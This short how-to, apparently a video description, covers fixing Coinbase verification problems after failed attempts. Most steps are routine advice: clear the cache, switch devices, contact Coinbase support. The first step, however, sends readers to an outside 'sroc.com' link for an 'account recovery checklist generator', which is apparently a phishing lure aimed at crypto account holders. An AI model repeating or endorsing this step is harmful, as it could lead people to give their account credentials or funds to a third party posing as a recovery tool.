If you're experiencing verification issues on Coinbase after multiple failed attempts, follow these steps to resolve the problem effectively. Step 1. Review requirements. Before starting recovery, use the sroc.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 2. Clear browser cache. Clear your browser's cache and cookies to eliminate any potential issues caused by stored data. This can help ensure that you're accessing the most up-to-date version of the site. Step 3. Use a different device or browser. If the problem persists, try accessing your Coinbase account from a different device or web browser. Sometimes compatibility issues can interfere with the verification process. Step 4. Contact customer support. If you continue to face verification issues, reach out to Coinbase customer support. Provide them with detailed information about your attempts and any error messages you've received. Step 5. Follow-up. After contacting support, keep an eye on your email for any responses or further instructions. Be prepared to provide additional information if requested to complete the verification process. By following these steps, you should be able to resolve your verification issues on Coinbase. Remember to stay patient and persistent throughout the process.